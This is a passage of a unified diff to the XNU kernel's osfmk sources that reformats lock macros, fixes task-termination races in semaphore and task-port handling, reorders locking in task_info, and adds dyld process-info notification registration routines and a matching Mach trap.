grp) \ + usimple_lock_try_lock_mp_signal_safe_loop_deadline(lck, ddl) extern unsigned int usimple_lock_try_lock_mp_signal_safe_loop_duration( usimple_lock_t, uint64_t); -#define usimple_lock_try_lock_mp_signal_safe_loop_duration(lck, dur, grp) usimple_lock_try_lock_mp_signal_safe_loop_duration(lck, 
dur) +#define usimple_lock_try_lock_mp_signal_safe_loop_duration(lck, dur, grp) \ + usimple_lock_try_lock_mp_signal_safe_loop_duration(lck, dur) #endif #endif /* LOCK_STATS */ @@ -237,24 +260,21 @@ extern void usimple_unlock( usimple_lock_t); -__END_DECLS - -#define ETAP_NO_TRACE 0 -#define ETAP_IO_AHA 0 - /* * If we got to here and we still don't have simple_lock_init * defined, then we must either be outside the osfmk component, * running on a true SMP, or need debug. */ #if !defined(simple_lock_init) -#define simple_lock_init(l, t) usimple_lock_init(l,t) -#define simple_lock(l, grp) usimple_lock(l, grp) -#define simple_unlock(l) usimple_unlock(l) -#define simple_lock_try(l, grp) usimple_lock_try(l, grp) +#define simple_lock_init(l, t) usimple_lock_init(l,t) +#define simple_lock(l, grp) usimple_lock(l, grp) +#define simple_unlock(l) usimple_unlock(l) +#define simple_lock_try(l, grp) usimple_lock_try(l, grp) #define simple_lock_try_lock_loop(l, grp) usimple_lock_try_lock_loop(l, grp) -#define simple_lock_try_lock_mp_signal_safe_loop_deadline(l, ddl, grp) usimple_lock_try_lock_mp_signal_safe_loop_deadline(l, ddl, grp) -#define simple_lock_try_lock_mp_signal_safe_loop_duration(l, dur, grp) usimple_lock_try_lock_mp_signal_safe_loop_duration(l, dur, grp) +#define simple_lock_try_lock_mp_signal_safe_loop_deadline(l, ddl, grp) \ + usimple_lock_try_lock_mp_signal_safe_loop_deadline(l, ddl, grp) +#define simple_lock_try_lock_mp_signal_safe_loop_duration(l, dur, grp) \ + usimple_lock_try_lock_mp_signal_safe_loop_duration(l, dur, grp) #define simple_lock_addr(l) (&(l)) #endif /* !defined(simple_lock_init) */ @@ -288,23 +308,27 @@ extern unsigned int hw_lock_bit_to( extern void hw_lock_bit( hw_lock_bit_t *, unsigned int); -#define hw_lock_bit(lck, bit, grp) hw_lock_bit(lck, bit) +#define hw_lock_bit(lck, bit, grp) \ + hw_lock_bit(lck, bit) extern void hw_lock_bit_nopreempt( hw_lock_bit_t *, unsigned int); -#define hw_lock_bit_nopreempt(lck, bit, grp) 
hw_lock_bit_nopreempt(lck, bit) +#define hw_lock_bit_nopreempt(lck, bit, grp) \ + hw_lock_bit_nopreempt(lck, bit) extern unsigned int hw_lock_bit_try( hw_lock_bit_t *, unsigned int); -#define hw_lock_bit_try(lck, bit, grp) hw_lock_bit_try(lck, bit) +#define hw_lock_bit_try(lck, bit, grp) \ + hw_lock_bit_try(lck, bit) extern unsigned int hw_lock_bit_to( hw_lock_bit_t *, unsigned int, uint32_t); -#define hw_lock_bit_to(lck, bit, timeout, grp) hw_lock_bit_to(lck, bit, timeout) +#define hw_lock_bit_to(lck, bit, timeout, grp) \ + hw_lock_bit_to(lck, bit, timeout) #endif /* LOCK_STATS */ @@ -316,10 +340,16 @@ extern void hw_unlock_bit_nopreempt( hw_lock_bit_t *, unsigned int); -#define hw_lock_bit_held(l, b) (((*(l))&(1<ip_kobject; + sc = (suid_cred_t)ipc_kobject_get(port); ipc_kobject_set_atomically(port, IKO_NULL, IKOT_NONE); ip_unlock(port); @@ -143,7 +143,7 @@ convert_suid_cred_to_port(suid_cred_t sc) } if (!ipc_kobject_make_send_lazy_alloc_port(&sc->port, - (ipc_kobject_t) sc, IKOT_SUID_CRED, false, 0)) { + (ipc_kobject_t) sc, IKOT_SUID_CRED, IPC_KOBJECT_ALLOC_NONE, false, 0)) { suid_cred_free(sc); return IP_NULL; } @@ -177,7 +177,7 @@ suid_cred_verify(ipc_port_t port, struct vnode *vnode, uint32_t *uid) return -1; } - sc = (suid_cred_t)port->ip_kobject; + sc = (suid_cred_t)ipc_kobject_get(port); if (vnode != sc->vnode) { ip_unlock(port); diff --git a/osfmk/kern/sync_sema.c b/osfmk/kern/sync_sema.c index 31ea5caae..dfa8d1153 100644 --- a/osfmk/kern/sync_sema.c +++ b/osfmk/kern/sync_sema.c @@ -180,6 +180,12 @@ semaphore_create( * the new semaphore to the task's semaphore list. 
*/ task_lock(task); + /* Check for race with task_terminate */ + if (!task->active) { + task_unlock(task); + zfree(semaphore_zone, s); + return KERN_INVALID_TASK; + } enqueue_head(&task->semaphore_list, (queue_entry_t) s); task->semaphores_owned++; task_unlock(task); diff --git a/osfmk/kern/syscall_subr.c b/osfmk/kern/syscall_subr.c index 4d65fe2ae..60af738a8 100644 --- a/osfmk/kern/syscall_subr.c +++ b/osfmk/kern/syscall_subr.c @@ -58,7 +58,7 @@ #include #include #include -#include +#include #include #include #include @@ -131,8 +131,6 @@ swtch( } enable_preemption(); - counter(c_swtch_block++); - thread_yield_with_continuation((thread_continue_t)swtch_continue, NULL); } @@ -170,8 +168,6 @@ swtch_pri( } enable_preemption(); - counter(c_swtch_pri_block++); - thread_depress_abstime(thread_depress_time); thread_yield_with_continuation((thread_continue_t)swtch_pri_continue, NULL); diff --git a/osfmk/kern/syscall_sw.c b/osfmk/kern/syscall_sw.c index f6a6c7ad7..9a2484022 100644 --- a/osfmk/kern/syscall_sw.c +++ b/osfmk/kern/syscall_sw.c @@ -115,7 +115,7 @@ const mach_trap_t mach_trap_table[MACH_TRAP_TABLE_COUNT] = { /* 10 */ MACH_TRAP(_kernelrpc_mach_vm_allocate_trap, 4, 5, munge_wwlw), /* 11 */ MACH_TRAP(_kernelrpc_mach_vm_purgable_control_trap, 4, 5, munge_wlww), /* 12 */ MACH_TRAP(_kernelrpc_mach_vm_deallocate_trap, 3, 5, munge_wll), -/* 13 */ MACH_TRAP(kern_invalid, 0, 0, NULL), +/* 13 */ MACH_TRAP(task_dyld_process_info_notify_get_trap, 2, 4, munge_ll), /* 14 */ MACH_TRAP(_kernelrpc_mach_vm_protect_trap, 5, 7, munge_wllww), /* 15 */ MACH_TRAP(_kernelrpc_mach_vm_map_trap, 6, 8, munge_wwllww), /* 16 */ MACH_TRAP(_kernelrpc_mach_port_allocate_trap, 3, 3, munge_www), @@ -233,7 +233,7 @@ const mach_trap_t mach_trap_table[MACH_TRAP_TABLE_COUNT] = { /* 127 */ MACH_TRAP(kern_invalid, 0, 0, NULL), }; -const char * mach_syscall_name_table[MACH_TRAP_TABLE_COUNT] = { +const char * const mach_syscall_name_table[MACH_TRAP_TABLE_COUNT] = { /* 0 */ "kern_invalid", /* 1 */ 
"kern_invalid", /* 2 */ "kern_invalid", @@ -247,7 +247,7 @@ const char * mach_syscall_name_table[MACH_TRAP_TABLE_COUNT] = { /* 10 */ "_kernelrpc_mach_vm_allocate_trap", /* 11 */ "kern_invalid", /* 12 */ "_kernelrpc_mach_vm_deallocate_trap", -/* 13 */ "kern_invalid", +/* 13 */ "task_dyld_process_info_notify_get_trap", /* 14 */ "_kernelrpc_mach_vm_protect_trap", /* 15 */ "_kernelrpc_mach_vm_map_trap", /* 16 */ "_kernelrpc_mach_port_allocate_trap", @@ -368,7 +368,7 @@ const char * mach_syscall_name_table[MACH_TRAP_TABLE_COUNT] = { /* 127 */ "kern_invalid", }; -int mach_trap_count = (sizeof(mach_trap_table) / sizeof(mach_trap_table[0])); +const int mach_trap_count = (sizeof(mach_trap_table) / sizeof(mach_trap_table[0])); kern_return_t kern_invalid( diff --git a/osfmk/kern/syscall_sw.h b/osfmk/kern/syscall_sw.h index 2816a65fc..c15f8f097 100644 --- a/osfmk/kern/syscall_sw.h +++ b/osfmk/kern/syscall_sw.h @@ -88,7 +88,7 @@ typedef struct { extern const mach_trap_t mach_trap_table[]; -extern int mach_trap_count; +extern const int mach_trap_count; #if CONFIG_REQUIRES_U32_MUNGING || (__arm__ && (__BIGGEST_ALIGNMENT__ > 4)) diff --git a/osfmk/kern/task.c b/osfmk/kern/task.c index 1ace4c3ec..1266acd83 100644 --- a/osfmk/kern/task.c +++ b/osfmk/kern/task.c @@ -166,6 +166,7 @@ #include #include +#include #include /* picks up ledger.h */ @@ -213,6 +214,10 @@ LCK_SPIN_DECLARE_ATTR(dead_task_statistics_lock, &task_lck_grp, &task_lck_attr); ledger_template_t task_ledger_template = NULL; +/* global lock for task_dyld_process_info_notify_{register, deregister, get_trap} */ +LCK_GRP_DECLARE(g_dyldinfo_mtx_grp, "g_dyldinfo"); +LCK_MTX_DECLARE(g_dyldinfo_mtx, &g_dyldinfo_mtx_grp); + SECURITY_READ_ONLY_LATE(struct _task_ledger_indices) task_ledgers __attribute__((used)) = {.cpu_time = -1, .tkm_private = -1, @@ -1318,6 +1323,8 @@ task_create_internal( return KERN_RESOURCE_SHORTAGE; } + counter_alloc(&(new_task->faults)); + #if defined(HAS_APPLE_PAC) ml_task_set_rop_pid(new_task, 
parent_task, inherit_memory); ml_task_set_jop_pid(new_task, parent_task, inherit_memory); @@ -1447,6 +1454,8 @@ task_create_internal( new_task->requested_policy = default_task_requested_policy; new_task->effective_policy = default_task_effective_policy; + new_task->task_shared_region_slide = -1; + task_importance_init_from_parent(new_task, parent_task); if (parent_task != TASK_NULL) { @@ -1551,7 +1560,6 @@ task_create_internal( new_task->total_system_time = 0; new_task->total_ptime = 0; new_task->total_runnable_time = 0; - new_task->faults = 0; new_task->pageins = 0; new_task->cow_faults = 0; new_task->messages_sent = 0; @@ -1700,7 +1708,7 @@ task_rollup_accounting_info(task_t to_task, task_t from_task) to_task->total_system_time = from_task->total_system_time; to_task->total_ptime = from_task->total_ptime; to_task->total_runnable_time = from_task->total_runnable_time; - to_task->faults = from_task->faults; + counter_add(&to_task->faults, counter_load(&from_task->faults)); to_task->pageins = from_task->pageins; to_task->cow_faults = from_task->cow_faults; to_task->decompressions = from_task->decompressions; @@ -1906,6 +1914,8 @@ task_deallocate( btlog_remove_entries_for_element(task_ref_btlog, task); #endif + counter_free(&task->faults); + #if CONFIG_COALITIONS task_release_coalitions(task); #endif /* CONFIG_COALITIONS */ @@ -2270,7 +2280,7 @@ task_mark_corpse(task_t task) task_add_to_corpse_task_list(task); task_start_halt(task); - thread_terminate_internal(self_thread); + thread_terminate_internal(self_thread, TH_TERMINATE_OPTION_NONE); (void) thread_interrupt_level(wsave); assert(task->halting == TRUE); @@ -2298,6 +2308,7 @@ task_clear_corpse(task_t task) { thread_mtx_lock(th_iter); th_iter->inspection = FALSE; + ipc_thread_disable(th_iter); thread_mtx_unlock(th_iter); } @@ -2356,7 +2367,7 @@ task_port_with_flavor_notify(mach_msg_header_t *msg) ip_unlock(port); return; } - task = (task_t)port->ip_kobject; + task = (task_t)ipc_kobject_get(port); kotype = 
ip_kotype(port); if (task != TASK_NULL) { assert((IKOT_TASK_READ == kotype) || (IKOT_TASK_INSPECT == kotype)); @@ -2369,29 +2380,40 @@ task_port_with_flavor_notify(mach_msg_header_t *msg) return; } + if (kotype == IKOT_TASK_READ) { + flavor = TASK_FLAVOR_READ; + } else { + flavor = TASK_FLAVOR_INSPECT; + } + itk_lock(task); ip_lock(port); - require_ip_active(port); /* + * If the port is no longer active, then ipc_task_terminate() ran + * and destroyed the kobject already. Just deallocate the task + * ref we took and go away. + * + * It is also possible that several nsrequests are in flight, + * only one shall NULL-out the port entry, and this is the one + * that gets to dealloc the port. + * * Check for a stale no-senders notification. A call to any function * that vends out send rights to this port could resurrect it between * this notification being generated and actually being handled here. */ - if (port->ip_srights > 0) { + if (!ip_active(port) || + task->itk_task_ports[flavor] != port || + port->ip_srights > 0) { ip_unlock(port); itk_unlock(task); task_deallocate(task); return; } - if (kotype == IKOT_TASK_READ) { - flavor = TASK_FLAVOR_READ; - } else { - flavor = TASK_FLAVOR_INSPECT; - } - assert(task->itk_self[flavor] == port); - task->itk_self[flavor] = IP_NULL; - port->ip_kobject = IKOT_NONE; + assert(task->itk_task_ports[flavor] == port); + task->itk_task_ports[flavor] = IP_NULL; + + ipc_kobject_set_atomically(port, IKO_NULL, IKOT_NONE); ip_unlock(port); itk_unlock(task); task_deallocate(task); @@ -2705,7 +2727,7 @@ task_terminate_internal( * Terminate each thread in the task. 
*/ queue_iterate(&task->threads, thread, thread_t, task_threads) { - thread_terminate_internal(thread); + thread_terminate_internal(thread, TH_TERMINATE_OPTION_NONE); } #ifdef MACH_BSD @@ -2931,7 +2953,7 @@ task_start_halt_locked(task_t task, boolean_t should_mark_corpse) thread_mtx_unlock(thread); } if (thread != self) { - thread_terminate_internal(thread); + thread_terminate_internal(thread, TH_TERMINATE_OPTION_NONE); } } task->dispatchqueue_offset = dispatchqueue_offset; @@ -3224,6 +3246,8 @@ task_threads_internal( return KERN_INVALID_ARGUMENT; } + assert(flavor <= THREAD_FLAVOR_INSPECT); + for (;;) { task_lock(task); if (!task->active) { @@ -3315,8 +3339,14 @@ task_threads_internal( switch (flavor) { case THREAD_FLAVOR_CONTROL: - for (i = 0; i < actual; ++i) { - ((ipc_port_t *) thread_list)[i] = convert_thread_to_port(thread_list[i]); + if (task == current_task()) { + for (i = 0; i < actual; ++i) { + ((ipc_port_t *) thread_list)[i] = convert_thread_to_port_pinned(thread_list[i]); + } + } else { + for (i = 0; i < actual; ++i) { + ((ipc_port_t *) thread_list)[i] = convert_thread_to_port(thread_list[i]); + } } break; case THREAD_FLAVOR_READ: @@ -3329,8 +3359,6 @@ task_threads_internal( ((ipc_port_t *) thread_list)[i] = convert_thread_inspect_to_port(thread_list[i]); } break; - default: - return KERN_INVALID_ARGUMENT; } } @@ -3550,7 +3578,8 @@ task_suspend( * notification on that port (if none outstanding). */ (void)ipc_kobject_make_send_lazy_alloc_port((ipc_port_t *) &task->itk_resume, - (ipc_kobject_t)task, IKOT_TASK_RESUME, true, OS_PTRAUTH_DISCRIMINATOR("task.itk_resume")); + (ipc_kobject_t)task, IKOT_TASK_RESUME, IPC_KOBJECT_ALLOC_NONE, true, + OS_PTRAUTH_DISCRIMINATOR("task.itk_resume")); port = task->itk_resume; task_unlock(task); @@ -3559,12 +3588,19 @@ task_suspend( * but we'll look it up when calling a traditional resume. Any IPC operations that * deallocate the send right will auto-release the suspension. 
*/ - if ((kr = ipc_kmsg_copyout_object(current_task()->itk_space, ip_to_object(port), - MACH_MSG_TYPE_MOVE_SEND, NULL, NULL, &name)) != KERN_SUCCESS) { - printf("warning: %s(%d) failed to copyout suspension token for pid %d with error: %d\n", - proc_name_address(current_task()->bsd_info), proc_pid(current_task()->bsd_info), + if (IP_VALID(port)) { + kr = ipc_object_copyout(current_space(), ip_to_object(port), + MACH_MSG_TYPE_MOVE_SEND, IPC_OBJECT_COPYOUT_FLAGS_NONE, + NULL, NULL, &name); + } else { + kr = KERN_SUCCESS; + } + if (kr != KERN_SUCCESS) { + printf("warning: %s(%d) failed to copyout suspension " + "token for pid %d with error: %d\n", + proc_name_address(current_task()->bsd_info), + proc_pid(current_task()->bsd_info), task_pid(task), kr); - return kr; } return kr; @@ -4622,6 +4658,7 @@ task_info( { kern_return_t error = KERN_SUCCESS; mach_msg_type_number_t original_task_info_count; + bool is_kernel_task = (task == kernel_task); if (task == TASK_NULL) { return KERN_INVALID_ARGUMENT; @@ -5135,7 +5172,7 @@ task_info( events_info = (task_events_info_t) task_info_out; - events_info->faults = task->faults; + events_info->faults = (int32_t) MIN(counter_load(&task->faults), INT32_MAX); events_info->pageins = task->pageins; events_info->cow_faults = task->cow_faults; events_info->messages_sent = task->messages_sent; @@ -5233,11 +5270,19 @@ task_info( vm_info = (task_vm_info_t)task_info_out; - if (task == kernel_task) { + /* + * Do not hold both the task and map locks, + * so convert the task lock into a map reference, + * drop the task lock, then lock the map. 
+ */ + if (is_kernel_task) { map = kernel_map; - /* no lock */ + task_unlock(task); + /* no lock, no reference */ } else { map = task->map; + vm_map_reference(map); + task_unlock(task); vm_map_lock_read(map); } @@ -5268,7 +5313,7 @@ task_info( vm_info->purgeable_volatile_pmap = 0; vm_info->purgeable_volatile_resident = 0; vm_info->purgeable_volatile_virtual = 0; - if (task == kernel_task) { + if (is_kernel_task) { /* * We do not maintain the detailed stats for the * kernel_pmap, so just count everything as @@ -5318,16 +5363,41 @@ task_info( } *task_info_count = TASK_VM_INFO_REV0_COUNT; + if (original_task_info_count >= TASK_VM_INFO_REV2_COUNT) { + /* must be captured while we still have the map lock */ + vm_info->min_address = map->min_offset; + vm_info->max_address = map->max_offset; + } + + /* + * Done with vm map things, can drop the map lock and reference, + * and take the task lock back. + * + * Re-validate that the task didn't die on us. + */ + if (!is_kernel_task) { + vm_map_unlock_read(map); + vm_map_deallocate(map); + } + map = VM_MAP_NULL; + + task_lock(task); + + if ((task != current_task()) && (!task->active)) { + error = KERN_INVALID_ARGUMENT; + break; + } + if (original_task_info_count >= TASK_VM_INFO_REV1_COUNT) { vm_info->phys_footprint = (mach_vm_size_t) get_task_phys_footprint(task); *task_info_count = TASK_VM_INFO_REV1_COUNT; } if (original_task_info_count >= TASK_VM_INFO_REV2_COUNT) { - vm_info->min_address = map->min_offset; - vm_info->max_address = map->max_offset; + /* data was captured above */ *task_info_count = TASK_VM_INFO_REV2_COUNT; } + if (original_task_info_count >= TASK_VM_INFO_REV3_COUNT) { ledger_get_lifetime_max(task->ledger, task_ledgers.phys_footprint, @@ -5413,10 +5483,6 @@ task_info( *task_info_count = TASK_VM_INFO_REV5_COUNT; } - if (task != kernel_task) { - vm_map_unlock_read(map); - } - break; } @@ -5560,7 +5626,7 @@ task_info( * checks on task_port. 
* * In the case of TASK_DYLD_INFO, we require the more - * privileged task_port not the less-privileged task_name_port. + * privileged task_read_port not the less-privileged task_name_port. * */ kern_return_t @@ -5574,7 +5640,7 @@ task_info_from_user( kern_return_t ret; if (flavor == TASK_DYLD_INFO) { - task = convert_port_to_task(task_port); + task = convert_port_to_task_read(task_port); } else { task = convert_port_to_task_name(task_port); } @@ -5586,6 +5652,298 @@ task_info_from_user( return ret; } +/* + * Routine: task_dyld_process_info_update_helper + * + * Release send rights in release_ports. + * + * If no active ports found in task's dyld notifier array, unset the magic value + * in user space to indicate so. + * + * Condition: + * task's itk_lock is locked, and is unlocked upon return. + * Global g_dyldinfo_mtx is locked, and is unlocked upon return. + */ +void +task_dyld_process_info_update_helper( + task_t task, + size_t active_count, + vm_map_address_t magic_addr, /* a userspace address */ + ipc_port_t *release_ports, + size_t release_count) +{ + void *notifiers_ptr = NULL; + + assert(release_count <= DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT); + + if (active_count == 0) { + assert(task->itk_dyld_notify != NULL); + notifiers_ptr = task->itk_dyld_notify; + task->itk_dyld_notify = NULL; + itk_unlock(task); + + kfree(notifiers_ptr, (vm_size_t)sizeof(ipc_port_t) * DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT); + (void)copyoutmap_atomic32(task->map, MACH_PORT_NULL, magic_addr); /* unset magic */ + } else { + itk_unlock(task); + (void)copyoutmap_atomic32(task->map, (mach_port_name_t)DYLD_PROCESS_INFO_NOTIFY_MAGIC, + magic_addr); /* reset magic */ + } + + lck_mtx_unlock(&g_dyldinfo_mtx); + + for (size_t i = 0; i < release_count; i++) { + ipc_port_release_send(release_ports[i]); + } +} + +/* + * Routine: task_dyld_process_info_notify_register + * + * Insert a send right to target task's itk_dyld_notify array. 
Allocate kernel + * memory for the array if it's the first port to be registered. Also cleanup + * any dead rights found in the array. + * + * Consumes sright if returns KERN_SUCCESS, otherwise MIG will destroy it. + * + * Args: + * task: Target task for the registration. + * sright: A send right. + * + * Returns: + * KERN_SUCCESS: Registration succeeded. + * KERN_INVALID_TASK: task is invalid. + * KERN_INVALID_RIGHT: sright is invalid. + * KERN_DENIED: Security policy denied this call. + * KERN_RESOURCE_SHORTAGE: Kernel memory allocation failed. + * KERN_NO_SPACE: No available notifier port slot left for this task. + * KERN_RIGHT_EXISTS: The notifier port is already registered and active. + * + * Other error code see task_info(). + * + * See Also: + * task_dyld_process_info_notify_get_trap() in mach_kernelrpc.c + */ +kern_return_t +task_dyld_process_info_notify_register( + task_t task, + ipc_port_t sright) +{ + struct task_dyld_info dyld_info; + mach_msg_type_number_t info_count = TASK_DYLD_INFO_COUNT; + ipc_port_t release_ports[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT]; + uint32_t release_count = 0, active_count = 0; + mach_vm_address_t ports_addr; /* a user space address */ + kern_return_t kr; + boolean_t right_exists = false; + ipc_port_t *notifiers_ptr = NULL; + ipc_port_t *portp; + + if (task == TASK_NULL || task == kernel_task) { + return KERN_INVALID_TASK; + } + + if (!IP_VALID(sright)) { + return KERN_INVALID_RIGHT; + } + +#if CONFIG_MACF + if (mac_task_check_dyld_process_info_notify_register()) { + return KERN_DENIED; + } +#endif + + kr = task_info(task, TASK_DYLD_INFO, (task_info_t)&dyld_info, &info_count); + if (kr) { + return kr; + } + + if (dyld_info.all_image_info_format == TASK_DYLD_ALL_IMAGE_INFO_32) { + ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr + + offsetof(struct user32_dyld_all_image_infos, notifyMachPorts)); + } else { + ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr + + offsetof(struct 
user64_dyld_all_image_infos, notifyMachPorts)); + } + + if (task->itk_dyld_notify == NULL) { + notifiers_ptr = (ipc_port_t *) + kalloc_flags(sizeof(ipc_port_t) * DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT, Z_ZERO); + if (!notifiers_ptr) { + return KERN_RESOURCE_SHORTAGE; + } + } + + lck_mtx_lock(&g_dyldinfo_mtx); + itk_lock(task); + + if (task->itk_dyld_notify == NULL) { + task->itk_dyld_notify = notifiers_ptr; + notifiers_ptr = NULL; + } + + assert(task->itk_dyld_notify != NULL); + /* First pass: clear dead names and check for duplicate registration */ + for (int slot = 0; slot < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; slot++) { + portp = &task->itk_dyld_notify[slot]; + if (*portp != IPC_PORT_NULL && !ip_active(*portp)) { + release_ports[release_count++] = *portp; + *portp = IPC_PORT_NULL; + } else if (*portp == sright) { + /* the port is already registered and is active */ + right_exists = true; + } + + if (*portp != IPC_PORT_NULL) { + active_count++; + } + } + + if (right_exists) { + /* skip second pass */ + kr = KERN_RIGHT_EXISTS; + goto out; + } + + /* Second pass: register the port */ + kr = KERN_NO_SPACE; + for (int slot = 0; slot < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; slot++) { + portp = &task->itk_dyld_notify[slot]; + if (*portp == IPC_PORT_NULL) { + *portp = sright; + active_count++; + kr = KERN_SUCCESS; + break; + } + } + +out: + assert(active_count > 0); + + task_dyld_process_info_update_helper(task, active_count, + (vm_map_address_t)ports_addr, release_ports, release_count); + /* itk_lock, g_dyldinfo_mtx are unlocked upon return */ + + if (notifiers_ptr) { + kfree(notifiers_ptr, sizeof(ipc_port_t) * DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT); + } + + return kr; +} + +/* + * Routine: task_dyld_process_info_notify_deregister + * + * Remove a send right in target task's itk_dyld_notify array matching the receive + * right name passed in. Deallocate kernel memory for the array if it's the last port to + * be deregistered, or all ports have died. 
Also clean up any dead rights found in the array. + * + * Does not consume any reference. + * + * Args: + * task: Target task for the deregistration. + * rcv_name: The name denoting the receive right in caller's space. + * + * Returns: + * KERN_SUCCESS: A matching entry found and deregistration succeeded. + * KERN_INVALID_TASK: task is invalid. + * KERN_INVALID_NAME: name is invalid. + * KERN_DENIED: Security policy denied this call. + * KERN_FAILURE: A matching entry is not found. + * KERN_INVALID_RIGHT: The name passed in does not represent a valid rcv right. + * + * For other error codes, see task_info(). + * + * See Also: + * task_dyld_process_info_notify_get_trap() in mach_kernelrpc.c + */ +kern_return_t +task_dyld_process_info_notify_deregister( + task_t task, + mach_port_name_t rcv_name) +{ + struct task_dyld_info dyld_info; + mach_msg_type_number_t info_count = TASK_DYLD_INFO_COUNT; + ipc_port_t release_ports[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT]; + uint32_t release_count = 0, active_count = 0; + boolean_t port_found = false; + mach_vm_address_t ports_addr; /* a user space address */ + ipc_port_t sright; + kern_return_t kr; + ipc_port_t *portp; + + if (task == TASK_NULL || task == kernel_task) { + return KERN_INVALID_TASK; + } + + if (!MACH_PORT_VALID(rcv_name)) { + return KERN_INVALID_NAME; + } + +#if CONFIG_MACF + if (mac_task_check_dyld_process_info_notify_register()) { + return KERN_DENIED; + } +#endif + + kr = task_info(task, TASK_DYLD_INFO, (task_info_t)&dyld_info, &info_count); + if (kr) { + return kr; + } + + if (dyld_info.all_image_info_format == TASK_DYLD_ALL_IMAGE_INFO_32) { + ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr + + offsetof(struct user32_dyld_all_image_infos, notifyMachPorts)); + } else { + ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr + + offsetof(struct user64_dyld_all_image_infos, notifyMachPorts)); + } + + kr = ipc_port_translate_receive(current_space(), rcv_name, &sright); /* does not produce port ref */ + 
if (kr) { + return KERN_INVALID_RIGHT; + } + + ip_reference(sright); + ip_unlock(sright); + + assert(sright != IPC_PORT_NULL); + + lck_mtx_lock(&g_dyldinfo_mtx); + itk_lock(task); + + if (task->itk_dyld_notify == NULL) { + itk_unlock(task); + lck_mtx_unlock(&g_dyldinfo_mtx); + ip_release(sright); + return KERN_FAILURE; + } + + for (int slot = 0; slot < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; slot++) { + portp = &task->itk_dyld_notify[slot]; + if (*portp == sright) { + release_ports[release_count++] = *portp; + *portp = IPC_PORT_NULL; + port_found = true; + } else if ((*portp != IPC_PORT_NULL && !ip_active(*portp))) { + release_ports[release_count++] = *portp; + *portp = IPC_PORT_NULL; + } + + if (*portp != IPC_PORT_NULL) { + active_count++; + } + } + + task_dyld_process_info_update_helper(task, active_count, + (vm_map_address_t)ports_addr, release_ports, release_count); + /* itk_lock, g_dyldinfo_mtx are unlocked upon return */ + + ip_release(sright); + + return port_found ? KERN_SUCCESS : KERN_FAILURE; +} + /* * task_power_info * diff --git a/osfmk/kern/task.h b/osfmk/kern/task.h index d74ddc935..266ea4ce9 100644 --- a/osfmk/kern/task.h +++ b/osfmk/kern/task.h @@ -98,6 +98,7 @@ #ifdef XNU_KERNEL_PRIVATE #include #include +#include #include #include #endif /* XNU_KERNEL_PRIVATE */ @@ -152,11 +153,12 @@ struct task_watchports; struct task { /* Synchronization/destruction information */ - decl_lck_mtx_data(, lock); /* Task's lock */ + decl_lck_mtx_data(, lock); /* Task's lock */ os_refcnt_t ref_count; /* Number of references to me */ - boolean_t active; /* Task has not been terminated */ - boolean_t halting; /* Task is being halted */ - boolean_t message_app_suspended; /* Let iokit know when pidsuspended */ + bool active; /* Task has not been terminated */ + bool ipc_active; /* IPC with the task ports is allowed */ + bool halting; /* Task is being halted */ + bool message_app_suspended; /* Let iokit know when pidsuspended */ /* Virtual timers */ uint32_t vtimers; @@ 
-207,19 +209,21 @@ struct task { * Different flavors of task port. * These flavors TASK_FLAVOR_* are defined in mach_types.h */ - struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_self") itk_self[TASK_SELF_PORT_COUNT]; /* does not hold right */ - struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_settable_self") itk_settable_self; /* a send right */ + struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_task_ports") itk_task_ports[TASK_SELF_PORT_COUNT]; + struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_settable_self") itk_settable_self; /* a send right */ + struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_self") itk_self; /* immovable/pinned task port, does not hold right */ struct exception_action exc_actions[EXC_TYPES_COUNT]; /* a send right each valid element */ - struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_host") itk_host; /* a send right */ - struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_bootstrap") itk_bootstrap; /* a send right */ - struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_seatbelt") itk_seatbelt; /* a send right */ - struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_gssd") itk_gssd; /* yet another send right */ - struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_debug_control") itk_debug_control; /* send right for debugmode communications */ - struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_task_access") itk_task_access; /* and another send right */ - struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_resume") itk_resume; /* a receive right to resume this task */ + struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_host") itk_host; /* a send right */ + struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_bootstrap") itk_bootstrap; /* a send right */ + struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_seatbelt") itk_seatbelt; /* a send right */ + struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_gssd") itk_gssd; /* yet another send right */ + struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_debug_control") itk_debug_control; 
